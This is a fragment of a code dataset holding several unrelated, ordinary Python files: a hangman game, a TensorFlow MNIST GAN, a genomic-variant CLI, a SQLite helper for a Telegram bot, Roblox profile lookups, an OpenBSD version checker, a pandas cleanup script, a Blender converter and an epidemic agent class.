\"муравей\", \"мангуст\", \"медведь\", \"морж\", \"муха\", \"мышь\", \"медуза\", \"нарвал\", \"носорог\", \"орел\", \"омар\", \"олень\", \"овцебык\",\n\"осьминог\", \"орел\", \"осел\", \"оса\", \"овца\", \"опоссум\", \"обезьяна\", \"паук\", \"пескарь\", \"пингвин\", \"пиранья\", \"попугай\",\n\"пчела\", \"рысь\", \"рыба\", \"росомаха\", \"страус\", \"сурок\", \"стрекоза\", \"сорока\", \"сова\", \"снегирь\", \"сокол\", \"собака\", \"слон\",\n\"слон\", \"скорпион\", \"скворец\", \"скат\", \"сельдь\", \"свинья\", \"сурикат\", \"скунс\", \"слизень\", \"светлячок\", \"тюлень\", \"тукан\", \"тигр\",\n\"трясогуска\", \"термит\", \"тетерев\", \"тунец\", \"тритон\", \"тарантул\", \"таракан\", \"тля\", \"утконос\", \"уж\", \"устрица\", \"улитка\", \"угорь\", \"фазан\", \"фламинго\",\n\"форель\", \"хорек\", \"хомяк\", \"хамелеон\", \"цапля\", \"цесарка\", \"цикада\", \"черепаха\", \"червь\", \"чайка\", \"шимпанзе\", \"шиншилла\",\n\"щука\", \"эму\", \"ящерица\", \"ястреб\", \"як\", \"ягуар\"]\n\n\nMAX_ERRORS = 10\n\n\ndef return_random_word():\n return random.choice(WORDS)\n\n\ndef handle_user_input():\n user_input = input('Please, input letter: ')\n return user_input\n\n\ndef get_initial_statuses(word):\n statuses = []\n for letter in word:\n statuses.append(False)\n return statuses\n\n\ndef is_game_finished(statuses, current_errors):\n if current_errors >= MAX_ERRORS:\n return True\n\n for status in statuses:\n if not status:\n return False\n\n return True\n\n\ndef perfom_check_action(word, statuses, letter):\n if letter not in word:\n return False\n\n for index, l in enumerate(word):\n if letter == l:\n statuses[index] = True\n\n return True\n\n\ndef print_word(word, statuses):\n for index, letter in enumerate(word):\n if statuses[index]:\n print(letter, end='')\n else:\n print('_', end=' ')\n print()\n\n\ndef main():\n word = return_random_word()\n statuses = get_initial_statuses(word)\n current_errors = 0\n\n while not is_game_finished(statuses, current_errors):\n print_word(word, statuses)\n print('Errors left: ', MAX_ERRORS - current_errors)\n letter = handle_user_input()\n result = perfom_check_action(word, statuses, letter)\n\n if not result:\n current_errors += 1\n\n if current_errors >= MAX_ERRORS:\n print('You lose!')\n else:\n print('You win!')\n\n\nmain()\n","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"550113710","text":"import tensorflow as 
tf\nimport numpy as np\nimport unittest\n\n\nclass GAN(object):\n def __init__(self, learning_rate):\n self._setup_inputs()\n tf.summary.image('target_images', self.target_images)\n\n target_labels = tf.one_hot(self.target_labels, 10)\n with tf.variable_scope('generator'):\n self.mnist_generated = \\\n self._generator(self.input_noise, target_labels, training=False)\n tf.summary.image('generated_images', self.mnist_generated)\n\n with tf.variable_scope('generator', reuse=True):\n self.generated = \\\n self._generator(self.input_noise, target_labels)\n\n with tf.variable_scope('discriminator'):\n self.logits, self.outputs = \\\n self._discriminator(self.target_images, training=False)\n\n with tf.variable_scope('discriminator', reuse=True):\n true_logits, _ = self._discriminator(self.target_images)\n\n with tf.variable_scope('discriminator', reuse=True):\n false_logits, _ = self._discriminator(self.generated)\n\n with tf.name_scope('loss'):\n self.d_loss1 = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=true_logits,\n labels=target_labels))\n self.d_loss2 = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=false_logits,\n labels=tf.zeros_like(target_labels)))\n self.d_loss = tf.add(self.d_loss1, self.d_loss2, name='d_loss')\n\n self.g_loss = tf.reduce_mean(\n tf.nn.sigmoid_cross_entropy_with_logits(logits=false_logits,\n labels=target_labels), name='g_loss')\n\n with tf.name_scope('optimization'):\n g_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, 'generator')\n d_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, 'discriminator')\n\n self.learning_rate = tf.Variable(learning_rate, trainable=False,\n name='learning_rate')\n self.train_g = tf.train.AdamOptimizer(\n self.learning_rate).minimize(self.g_loss, var_list=g_vars)\n\n self.train_d = tf.train.AdamOptimizer(\n self.learning_rate).minimize(self.d_loss, var_list=d_vars)\n\n with tf.name_scope('evaluation'):\n self.accuracy = self._evaluate(self.outputs, self.target_labels)\n tf.summary.scalar('train_accuracy', self.accuracy)\n\n with tf.name_scope('summary'):\n self.summary = tf.summary.merge_all()\n\n def _setup_inputs(self):\n self.target_images = tf.placeholder(dtype=tf.float32,\n shape=[None, 28, 28, 1], name='target_images')\n self.keep_prob = tf.placeholder(dtype=tf.float32,\n shape=(), name='keep_prob')\n self.target_labels = tf.placeholder(dtype=tf.int32,\n shape=[None], name='target_labels')\n self.input_noise = tf.placeholder(dtype=tf.float32,\n shape=[None, 28, 28, 1], name='input_noise')\n\n def _deconv(self, inputs, output_size, kernel_size, stride,\n leak=0.1, training=True):\n deconv = tf.layers.conv2d_transpose(inputs, output_size,\n kernel_size, strides=stride,\n activation=lambda x: tf.nn.leaky_relu(x, leak))\n if training:\n deconv = tf.nn.dropout(deconv, keep_prob=self.keep_prob)\n return deconv\n\n def _block(self, inputs, output_size, leak=0.1, training=True):\n init = tf.variance_scaling_initializer(2.0)\n\n conv = tf.layers.conv2d(inputs, output_size, 3,\n activation=lambda x: tf.nn.leaky_relu(x, leak), padding='SAME',\n kernel_initializer=init)\n conv = tf.layers.conv2d(conv, output_size, 1,\n activation=lambda x: tf.nn.leaky_relu(x, leak), padding='SAME',\n kernel_initializer=init)\n\n if training:\n conv = tf.nn.dropout(conv, keep_prob=self.keep_prob)\n return conv\n\n def _stack(self, conv, output_size, leak=0.1, training=True, multiple=1):\n for _ in range(multiple):\n conv = self._block(conv, output_size, leak, training=training)\n return conv\n\n def 
_down_sample(self, inputs, output_size, kernel_size,\n leak=0.1, training=True):\n init = tf.variance_scaling_initializer(2.0)\n conv = tf.layers.conv2d(inputs, output_size, kernel_size, strides=2,\n activation=lambda x: tf.nn.leaky_relu(x, leak), padding='SAME',\n kernel_initializer=init)\n\n if training:\n conv = tf.nn.dropout(conv, keep_prob=self.keep_prob)\n return conv\n\n def _generator(self, input_noise, label, training=True):\n with tf.name_scope('reshape_label'):\n label_input = tf.reshape(label, [-1, 1, 1, 10])\n\n with tf.name_scope('deconv1'):\n deconv = self._deconv(label_input, 16, 8, 1, training=training)\n\n with tf.name_scope('deconv2'):\n deconv = self._deconv(deconv, 32, 8, 2, training=training)\n\n with tf.name_scope('deconv3'):\n deconv = self._deconv(deconv, 64, 5, 1, training=training)\n\n with tf.name_scope('deconv4'):\n deconv = self._deconv(deconv, 128, 3, 1, training=training)\n\n init = tf.variance_scaling_initializer(2.0)\n with tf.name_scope('conv5'):\n conv1 = tf.layers.conv2d(deconv, 128, 3,\n activation=lambda x: tf.nn.leaky_relu(x, 0.1), padding='SAME',\n kernel_initializer=init)\n conv2 = tf.layers.conv2d(input_noise, 128, 3,\n activation=lambda x: tf.nn.leaky_relu(x, 0.1), padding='SAME',\n kernel_initializer=init)\n conv = tf.concat([conv1, conv2], axis=3)\n conv = self._block(conv, 256, training=training)\n\n with tf.name_scope('conv6'):\n conv = self._block(conv, 256, training=training)\n\n with tf.name_scope('output'):\n ow = tf.get_variable('ow', shape=[3, 3, 256, 1],\n initializer=init)\n ob = tf.get_variable('ob', shape=[1],\n initializer=tf.zeros_initializer())\n logits = tf.add(\n tf.nn.conv2d(conv, ow, strides=[1, 1, 1, 1], padding='SAME'), ob,\n name='logits')\n return logits\n\n def _discriminator(self, input_images, training=True):\n with tf.name_scope('conv1'):\n init = tf.variance_scaling_initializer(2.0)\n # init = tf.random_normal_initializer(stddev=0.01)\n conv = tf.layers.conv2d(input_images, 32, 3,\n activation=lambda x: tf.nn.leaky_relu(x, 0.1), padding='SAME',\n kernel_initializer=init)\n\n with tf.name_scope('conv2'):\n conv = self._block(conv, 64, training=training)\n conv = self._down_sample(conv, 64, 3, training=training)\n\n with tf.name_scope('conv3'):\n conv = self._stack(conv, 128, training=training, multiple=2)\n conv = self._down_sample(conv, 128, 3, training=training)\n\n with tf.name_scope('conv4'):\n conv = self._stack(conv, 256, training=training, multiple=2)\n\n with tf.name_scope('conv5'):\n conv = self._stack(conv, 512, training=training, multiple=3)\n\n with tf.name_scope('conv6'):\n conv = self._block(conv, 1024, training=training)\n\n with tf.name_scope('output'):\n init = tf.variance_scaling_initializer(2.0)\n ow = tf.get_variable('ow', shape=[7, 7, 1024, 10],\n initializer=init)\n ob = tf.get_variable('ob', shape=[10],\n initializer=tf.zeros_initializer())\n logits = tf.nn.conv2d(conv, ow, strides=[1, 1, 1, 1], padding='VALID') + ob\n logits = tf.reshape(logits, [-1, 10], name='logits')\n outputs = tf.nn.sigmoid(logits)\n return logits, outputs\n\n def _evaluate(self, prediction, labels):\n eq = tf.cast(tf.equal(tf.cast(tf.argmax(prediction, axis=1), tf.int32),\n labels), tf.float32)\n return tf.reduce_mean(eq)\n\n\nclass TestGAN(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.gan = GAN(1e-3)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n cls.sess = tf.Session(config=config)\n cls.sess.run(tf.global_variables_initializer())\n\n @classmethod\n def tearDownClass(cls):\n 
cls.sess.close()\n\n def test_generator_output(self):\n labels = np.random.randint(0, 9, [1])\n noise = np.random.randn(1, 28, 28, 1)\n\n gen = self.sess.run(self.gan.mnist_generated, feed_dict={\n self.gan.target_labels: labels,\n self.gan.input_noise: noise,\n })\n print(np.mean(gen))\n print(np.std(gen))\n\n def test_discriminator_outptt(self):\n images = np.random.rand(1, 28, 28, 1)\n\n logits, outputs = self.sess.run([self.gan.logits, self.gan.outputs],\n feed_dict={\n self.gan.target_images: images,\n })\n print(np.mean(logits))\n print(np.std(logits))\n\n print(np.mean(outputs))\n print(np.std(outputs))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"kaggle/mnist/mnist_gan.py","file_name":"mnist_gan.py","file_ext":"py","file_size_in_byte":8301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"4895286","text":"'''\nVariant manipulation.\n\nCollect variants specified on the commandline or in VCF or CSV files, apply\nfilters, and write out a CSV file.\n\n%(prog)s \n --variants /path/to/first.vcf \\\n --variants /path/to/second.vcf \\\n --variant-filter \"ref=='A'\" \\\n --out-variants result.csv\n\n'''\nfrom __future__ import absolute_import\n\nimport argparse\nimport sys\nimport logging\nimport collections\n\nfrom . import configure_logging\nfrom .. import variant_includes\nfrom .. import variants_util\nfrom ..evaluation import parse_labeled_expression\n\nparser = argparse.ArgumentParser(usage=__doc__)\nvariants_util.add_args(parser)\nparser.add_argument(\"field\", nargs=\"*\")\nparser.add_argument(\"--no-standard-columns\",\n action=\"store_true\", default=False,\n help=\"Don't write standard columns (genome, contig, start, end, ref, alt)\")\n\nparser.add_argument(\"--chunk-rows\", metavar=\"N\", type=int,\n help=\"Write out current results after processing N rows.\")\n\nparser.add_argument(\"--limit\", metavar=\"N\", type=int,\n help=\"Process only the first N variants (useful for testing)\")\n\nparser.add_argument(\"--columns\",\n help=\"Column separated list of columns to output\")\n\nparser.add_argument(\"--rename-column\", nargs=2, action=\"append\", default=[],\n metavar=(\"FROM\", \"TO\"),\n help=\"Rename output column FROM to TO. 
Can be specified multiple times.\")\n\nparser.add_argument(\"--out\")\n\nparser.add_argument('--include-metadata', action=\"store_true\", default=False,\n help=\"Output variant metadata when loading from VCF (info column, etc).\")\n\nparser.add_argument('--include-variant-source',\n action=\"store_true\", default=False,\n help=\"Output the source file each variant originates from\")\n\nfor includeable in variant_includes.INCLUDEABLES:\n includeable.add_args(parser)\n\nparser.add_argument(\"-v\", \"--verbose\", action=\"store_true\", default=False)\n\ndef run(raw_args=sys.argv[1:]):\n args = parser.parse_args(raw_args)\n configure_logging(args)\n\n df = variants_util.load_from_args_as_dataframe(args)\n if df is None:\n parser.error(\"No variants specified.\")\n\n logging.info(\"Loaded %d variants.\" % df.shape[0])\n\n # We run the inverse of the column renames on the input df.\n column_renames = {}\n if args.rename_column:\n column_renames = dict(args.rename_column)\n column_renames_inverse = dict((v, k) for (k, v) in args.rename_column)\n if len(column_renames) != len(column_renames_inverse):\n raise ValueError(\"Column renames are not 1:1\")\n\n df.columns = [\n column_renames_inverse.get(col, col) for col in df.columns\n ]\n\n extra_columns = collections.OrderedDict()\n for labeled_expression in args.field:\n (label, expression) = parse_labeled_expression(labeled_expression)\n extra_columns[label] = expression\n\n for (column, callable_or_expression) in extra_columns.items():\n df[column] = [\n variants_util.evaluate_variant_expression(\n callable_or_expression, row.to_dict(), row.variant)\n for (i, row) in df.iterrows()\n ]\n\n def save(df):\n if column_renames:\n df = df.copy()\n df.columns = [column_renames.get(col, col) for col in df.columns]\n\n if args.columns:\n columns = [x.strip() for x in args.columns.split(\",\")]\n else:\n columns = [x for x in df.columns.tolist() if x != \"variant\"]\n if not args.include_metadata:\n columns = [\n x for x in columns\n if x in extra_columns or not x.startswith(\"metadata_\")\n ]\n if args.no_standard_columns:\n columns = [\n x for x in columns\n if x in extra_columns or (\n x not in variants_util.STANDARD_DATAFRAME_COLUMNS)\n ]\n if not args.include_variant_source:\n columns = [\n x for x in columns\n if x in extra_columns or x != \"variant_source\"\n ]\n\n df_save = df[columns]\n if args.out is None:\n # Write to stdout.\n df_save.to_csv(sys.stdout, index=False)\n elif args.out.endswith(\".csv\"):\n df_save.to_csv(args.out, index=False)\n print(\"Wrote: %s\" % args.out)\n else:\n parser.error(\"Unsupported output file extension: %s\" % args.out)\n\n for includeable in variant_includes.INCLUDEABLES:\n if includeable.requested(args):\n logging.info(\"Running includeable: %s\" % includeable.name)\n instance = includeable.from_args(args)\n for num_rows in instance.compute(df, chunk_rows=args.chunk_rows):\n if args.chunk_rows is not None:\n save(df)\n\n if args.chunk_rows is None:\n save(df)\n \n","sub_path":"varlens/commands/variants.py","file_name":"variants.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"496823271","text":"import sqlite3\nimport os.path\nfrom contextlib import closing\n\nESTADOS = {\"AC\": \"Acre\",\n \"AP\": \"Amapá\",\n \"AM\": \"Amazonas\",\n \"PA\": \"Pará\",\n \"RO\": \"Rondônia\",\n \"RR\": \"Roraima\",\n \"TO\": \"Tocantins\"}\n\n\n__DB_NAME = None\n\n\ndef cria_banco():\n with conecta() as conn:\n with 
closing(conn.cursor()) as c:\n c.execute('''CREATE TABLE estados\n (id INTEGER PRIMARY KEY, sigla text, nome text)''')\n c.execute('''CREATE TABLE membros\n (id INTEGER PRIMARY KEY, nome text, estado integer, telegram integer)''')\n for sigla, estado in ESTADOS.items():\n c.execute(\"\"\"insert into estados(sigla, nome) values(?,?)\"\"\", (sigla, estado))\n c.execute(\"\"\"CREATE TABLE eventos\n (id INTEGER PRIMARY KEY, data timestamp, descricao text, link text,\n telegram integer)\"\"\")\n conn.commit()\n\n\ndef lista():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n print(\"Estados\")\n for linha in c.execute(\"\"\"select id, sigla, nome from estados\"\"\"):\n print(linha)\n print(\"Membros\")\n for linha in c.execute(\"\"\"select id, nome, estado, telegram from membros\"\"\"):\n print(linha)\n\n\ndef get_estado(estado):\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n c.execute(u\"\"\"select id, sigla, nome from estados where sigla = ? or nome = ?\"\"\",\n (estado.upper(), estado.title()))\n estado = c.fetchone()\n if estado is None:\n return None\n else:\n return estado[0]\n\n\ndef get_stats():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n c.execute(u\"\"\"select e.nome, count(*)\n from membros m, estados e\n where m.estado=e.id\n group by e.nome\n order by e.nome\"\"\")\n por_estado = c.fetchall()\n c.execute(u\"\"\"select count(*)\n from membros m\"\"\")\n total = c.fetchone()[0]\n return [por_estado, total]\n\n\ndef get_eventos():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n c.execute(u\"\"\"select * from eventos\n where data >= datetime('now')\n order by data\"\"\")\n eventos = c.fetchall()\n print(eventos)\n return eventos\n\n\ndef update_user(from_user, estado):\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n id = from_user.id\n c.execute(\"select id, nome, estado, telegram from membros where telegram=?\", (id,))\n membro = c.fetchone()\n if membro is None:\n c.execute(u\"insert into membros(nome, estado, telegram) values (?,?,?)\",\n (\"{0.first_name} {0.last_name}\".format(from_user),\n estado, id))\n else:\n c.execute(u\"update membros set nome = ?, estado = ? 
where telegram = ?\",\n (\"{0.first_name} {0.last_name}\".format(from_user),\n estado, id))\n conn.commit()\n\n\ndef lista_users():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n usuarios = [\"Membros por Estado:\"]\n for linha in c.execute(u\"\"\"select m.nome, e.nome from membros m, estados e\n where m.estado = e.id\n order by e.nome, m.nome\"\"\"):\n usuarios.append(\"{0[0]}, {0[1]}\".format(linha))\n return \"\\n\".join(usuarios)\n\n\ndef lista_users_por_nome():\n with conecta() as conn:\n with closing(conn.cursor()) as c:\n usuarios = [\"Membros:\"]\n for linha in c.execute(u\"\"\"select m.nome, e.nome from membros m, estados e\n where m.estado = e.id\n order by m.nome\"\"\"):\n usuarios.append(\"{0[0]}, {0[1]}\".format(linha))\n return \"\\n\".join(usuarios)\n\n\ndef conecta():\n return sqlite3.connect(__DB_NAME, detect_types=sqlite3.PARSE_DECLTYPES)\n\n\ndef inicializa(nome=\"membros.db\"):\n global __DB_NAME\n __DB_NAME = nome\n existe = os.path.exists(nome)\n\n if not existe:\n cria_banco()\n\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"17298035","text":"import matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\n#Params\ndataSet = 2;\ns=5\n\n\n#Open data file\ncount = 0\nimuFile=\"data/newimudata6.txt\"\nmotorFile=\"data/newmotordata6.txt\"\nwith open(imuFile,\"r\") as f:\n\t#Get number of data entries\n\tfor line in f:\n\t\tcount=count+1\n\n#Set up empty arrays\nt=np.empty([count,1])\nroll=np.empty([count,1])\n\nwith open(imuFile,\"r\") as f:\n\t#Parse data from file\n\tfor i,line in enumerate(f):\n\t\tdata=line.split(\",\")\n\t\tt[i]=data[0]\n\t\troll[i]=data[1]\n\t\t\nroll = (roll)\n\ncount1 = 0\nwith open(motorFile,\"r\") as f:\n\t#Get number of data entries\n\tfor line in f:\n\t\tcount1=count1+1\nt1=np.empty([count1,1])\npos=np.empty([count1,1])\nwith open(motorFile,\"r\") as f:\n\t#Parse data from file\n\tfor i,line in enumerate(f):\n\t\tdata=line.split(\",\")\n\t\tt1[i]=data[0]\n\t\tpos[i]=data[1]\n\n\"\"\"\nfor p in pos:\n\tif p>90:\n\t\tp = 90-p\n\tif p<-90:\n\t\tp = -90-p\n\n\t\t\n\"\"\"\n\npos=-pos;\nfor i in range(0,count):\n\t\n\t\n\t\n\t\n\tnum=pos[i]//360\n\tif (num>0 and num%2==0):\n\t\tpos[i] = pos[i]-num*360\n\tif (num>0 and num%2==1):\n\t\tpos[i] = (num+1)*360-pos[i]\n\n\n\n\n\"\"\"\n\tif (180(.*?)
  &#8226; ', joinResponseText).group(0))\n    joinDateRa = re.sub('Join Date    ', '', joinDateRaw)\n    joinDate = re.sub('
  • ', '', joinDateRa)\n return joinDate\n if joinResponse.status_code != 200:\n return f'Got a {joinResponse.status_code}'\n\n\ndef verifiedCheck(userId):\n verifiedResponse = requests.get(f'https://api.roblox.com/ownership/hasasset?userId={userId}&assetId=102611803')\n if verifiedResponse.text == 'true':\n return True\n else:\n return False\n\t\t\ndef getRap(userId):\n types = ['Hat', 'HairAccessory', 'FaceAccessory', 'NeckAccessory', 'ShoulderAccessory', 'FrontAccessory', 'BackAccessory', 'WaistAccessory', 'Gear', 'Face']\n rap = 0\n for i in types:\n cursor = \"\"\n h = rapFunc1(userId, i, cursor)\n if \"data\" in h:\n for i in h[\"data\"]:\n if 'recentAveragePrice' in i:\n rap = rap + i['recentAveragePrice']\n if 'nextPageCursor' in h and h['nextPageCursor'] != 'None':\n cursor = h['nextPageCursor']\n else:\n break\n return rap\n\ndef rapFunc1(userId, i, cursor):\n res = requests.get(f'https://inventory.roblox.com/v1/users/{userId}/assets/collectibles?assetType={i}&limit=100&cursor={cursor}')\n res = res.json()\n return res\n\n","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"56564505","text":"#!/usr/bin/env python\n# - encoding:utf8 -\n\"\"\"\nscrit for testing the possibility to upgrade the system\n\"\"\"\nfrom common.httputils import exist_http_page\nfrom common.maintenance import system_exec, logger\nfrom common.MailingSystem import add_paragraph\n\nbase_repository = \"https://ftp.openbsd.org/pub/OpenBSD/\"\n\n\ndef get_actual_version():\n \"\"\"\n retreave te actual version number\n :return: version\n \"\"\"\n ret, version = system_exec(\"uname -r\")\n version = version[0]\n if \".\" not in version:\n return \"0.0\"\n return \".\".join(version.split(\".\")[0:2])\n\n\ndef increment_version(old_version):\n \"\"\"\n determine the next version number\n :param old_version: the starting version\n :return: the version number incremented\n \"\"\"\n a, b = [int(i) for i in old_version.split(\".\")]\n if b < 9:\n b += 1\n else:\n b = 0\n a += 1\n return str(a) + \".\" + str(b)\n\n\ndef main(dry_run: bool = False):\n \"\"\"\n main script execution\n :param dry_run: if the script should be run without system modification\n :return:\n \"\"\"\n logger.log(\"newversion_check\", \"Daily OpenBSD version Check\" + [\"\", \" dry\"][dry_run])\n old_version = get_actual_version()\n new_version = increment_version(old_version).strip()\n url_new = base_repository + new_version + \"/\"\n if exist_http_page(url_new):\n logger.log(\"newversion_check\", \"WARNING: new OpenBSD version available!\", 1)\n add_paragraph(\"OpenBSD Version Check\",\n message=\"**WARNING**: new OpenBSD version available [here](\" + url_new + \")\")\n else:\n logger.log(\"newversion_check\", \"no new OpenBSD version available!\")\n # logger.log(\"newversion_check\",\" check at: '\"+urlnew+\"'\")\n url_new = base_repository + old_version + \"/\"\n if not exist_http_page(url_new):\n logger.log_error(\"newversion_check\", \"Actual OpenBSD version no more supported\")\n add_paragraph(\"OpenBSD Version Check\",\n message=\"**WARNING**: actual OpenBSD version no more supported\")\n else:\n logger.log(\"newversion_check\", \"Actual OpenBSD version still available!\")\n\n\nif __name__ == \"__main__\":\n 
main()\n","sub_path":"p03_day/test_newversion.py","file_name":"test_newversion.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"182301045","text":"import pandas as pd\nfrom common import process_data\n\ncsv_df = pd.read_csv('../test.csv')\n\ncsv_df = process_data.get_clean_data(csv_df)\n\nprint(\n 'Before processing missing value, sample count =>\\n{}'.format(process_data.get_missing_value_sample_count(csv_df)))\nprint(\n 'Before processing missing value, sample proportion =>\\n{}'.format(\n process_data.get_missing_value_sample_proportion(csv_df)))\n\n# print(pd_csv.loc[pd_csv['TotalBsmtSF'].isnull()])\n# 將缺值的 TotalBsmtSF 以其平均數取代\ncsv_df['TotalBsmtSF'] = csv_df['TotalBsmtSF'].fillna(csv_df['TotalBsmtSF'].mean())\n# print(pd_csv['TotalBsmtSF'].isnull().sum())\n\nprint('Sample whose KitchenQual is null, KitchenAbvGr = ',\n csv_df.loc[csv_df['KitchenQual'].isnull()]['KitchenAbvGr'].values)\n# 找出 KitchenAbvGr 值為1的樣本,並列出它們的 KitchenQual\ncsv_df.loc[csv_df['KitchenAbvGr'] == 1]['KitchenQual']\n# 將缺值的 KitchenQual 以 'TA' 取代\ncsv_df['KitchenQual'] = csv_df['KitchenQual'].fillna('TA')\n# print(pd_csv['KitchenQual'].isnull().sum())\n\n# print('Sample whose GarageArea is null, GarageType = ', pd_csv.loc[pd_csv['GarageArea'].isnull()]['GarageType'].values)\n# 將缺值的 GarageArea 以 GarageType 為 'Detchd' 的樣本,其 GarageArea 的平均數取代\n# pd_csv['GarageArea'] = pd_csv['GarageArea'].fillna(int(pd_csv[pd_csv['GarageType']=='Detchd']['GarageArea'].mean()))\n# 將缺值的 GarageArea 以其平均數取代\ncsv_df['GarageArea'] = csv_df['GarageArea'].fillna(int(csv_df['GarageArea'].mean()))\n# print(pd_csv['GarageArea'].isnull().sum())\n\nprint('Sample whose SaleType is null, SaleCondition = ',\n csv_df.loc[csv_df['SaleType'].isnull()]['SaleCondition'].values)\n# 找出 SaleCondition 值為 'Normal' 的樣本,並列出它們的 SaleType\ncsv_df.loc[csv_df['SaleCondition'] == 'Normal']['SaleType']\n# 將缺值的 SaleType 以 'WD' 取代\ncsv_df['SaleType'] = csv_df['SaleType'].fillna('WD')\n# print(pd_csv['SaleType'].isnull().sum())\n\nprint('Sample whose GarageCars is null, GarageArea = ', csv_df.loc[csv_df['GarageCars'].isnull()]['GarageArea'].values)\n# 將缺值的 GarageCars 以 2 取代\ncsv_df['GarageCars'] = csv_df['GarageCars'].fillna(2)\n# print(pd_csv['GarageCars'].isnull().sum())\n\n# print('Sample whose MSZoning is null, MSSubClass = \\n', csv_df.loc[csv_df['MSZoning'].isnull()][['Id', 'MSSubClass']])\n# 找出 MSSubClass 值為 20/30/70 的樣本,並列出它們的 MSZoning\ncsv_df.loc[csv_df['MSSubClass'] == 20]['MSZoning']\ncsv_df.loc[csv_df['MSSubClass'] == 30]['MSZoning']\ncsv_df.loc[csv_df['MSSubClass'] == 70]['MSZoning']\n# 將缺值的 MSZoning 以 'RL' 取代\n# mask1 = (csv_df['MSZoning'].isnull()) & (csv_df['MSSubClass'] == 20)\n# csv_df.loc[mask1, \"MSZoning\"] = csv_df.loc[mask1, \"MSZoning\"].fillna('RL')\ncsv_df['MSZoning'] = csv_df['MSZoning'].fillna('RL')\n# print(csv_df['MSZoning'].isnull().sum())\n\n# 將缺值的 Utilities 以最常見的��取代\ncsv_df['Utilities'] = csv_df['Utilities'].fillna(csv_df['Utilities'].value_counts().index[0])\n\n# 將缺值的 Functional 以最常見的值取代\ncsv_df['Functional'] = csv_df['Functional'].fillna(csv_df['Functional'].value_counts().index[0])\n\nprint(\n 'After processing missing value, sample count =>\\n{}'.format(process_data.get_missing_value_sample_count(csv_df)))\nprint(\n 'After processing missing value, sample proportion =>\\n{}'.format(\n 
process_data.get_missing_value_sample_proportion(csv_df)))\n","sub_path":"EDA/EDA_for_predict_submission.py","file_name":"EDA_for_predict_submission.py","file_ext":"py","file_size_in_byte":3432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"330269709","text":"#!/usr/bin/python\nimport bpy\nimport sys\nimport os\n\nargv = sys.argv\n\nargv = argv[argv.index(\"--\") + 1:] # get all args after \"--\"\n\nprint(argv) # --> ['example', 'args', '123']\n\nif len(argv[0]) > 0:\n inputfile = argv[0]\nelse:\n print(\"Error. No inputed file.\")\n\nif len(argv) >= 2:\n outputfile = argv[1]\nelse:\n outputfile = argv[0] + \".stl\"\n\nbpy.ops.wm.read_factory_settings(use_empty=True)\n\nbpy.ops.import_scene.gltf(filepath=inputfile)\nbpy.ops.export_mesh.stl(filepath=outputfile)\n","sub_path":"mapdata/impExp.py","file_name":"impExp.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"492030914","text":"import random as rn\n\nclass Agent:\n\tdef __init__(self, id, is_infected, days_until_symptoms, total_days_sick, mortality_rate):\n\t\tself.id = id\n\n\t\tself.is_alive = True\n\t\tself.has_symptoms = False\n\t\tself.is_isolated = False\n\t\tself.is_infected = is_infected\n\t\tself.has_been_infected = is_infected\n\n\t\tself.day_infected = 0 if is_infected else float(\"-inf\")\n\t\tself.day_isolated = float(\"-inf\")\n\n\t\tself.days_until_symptoms = days_until_symptoms\n\t\tself.total_days_sick = total_days_sick\n\t\tself.mortality_rate = mortality_rate\n\n\t\tself.home = None\n\t\tself.office = None\n\n\tdef get_id(self):\n\t\treturn self.id\n\n\tdef set_home(self, home):\n\t\tself.home = home\n\n\tdef set_office(self, office):\n\t\tself.office = office\n\n\tdef can_get_infected(self):\n\t\tif self.is_infected or self.has_been_infected:\n\t\t\treturn False\n\t\treturn True\n\n\tdef set_infected(self, current_day):\n\t\tself.is_infected = True\n\t\tself.has_been_infected = True\n\t\tself.day_infected = current_day\n\n\tdef update_status(self, current_day):\n\t\tif not self.is_alive:\n\t\t\treturn\n\n\t\tif self.is_infected:\n\t\t\tif self.dies():\n\t\t\t\tself.is_alive = False\n\t\t\t\tself.is_infected = False\n\t\t\t\tself.has_symptoms = False\n\t\t\t\tself.is_isolated = True\n\t\t\t\treturn\n\n\t\t\tif self.day_infected + self.days_until_symptoms == current_day:\n\t\t\t\tself.has_symptoms = True\n\t\t\t\tself.is_isolated = True\n\n\t\t\tif self.day_infected + self.total_days_sick == current_day:\n\t\t\t\tself.is_infected = False\n\t\t\t\tself.is_isolated = False\n\t\t\t\tself.has_symptoms = False\n\n\t\tif not self.is_infected and self.is_isolated:\n\t\t\tif self.day_isolated + self.total_days_sick == current_day:\n\t\t\t\tself.is_isolated = False\n\n\tdef update_location(self, current_time):\n\t\tpass\n\n\tdef dies(self):\n\t\treturn rn.random() < self.mortality_rate\n\n\tdef set_in_isolation(self, 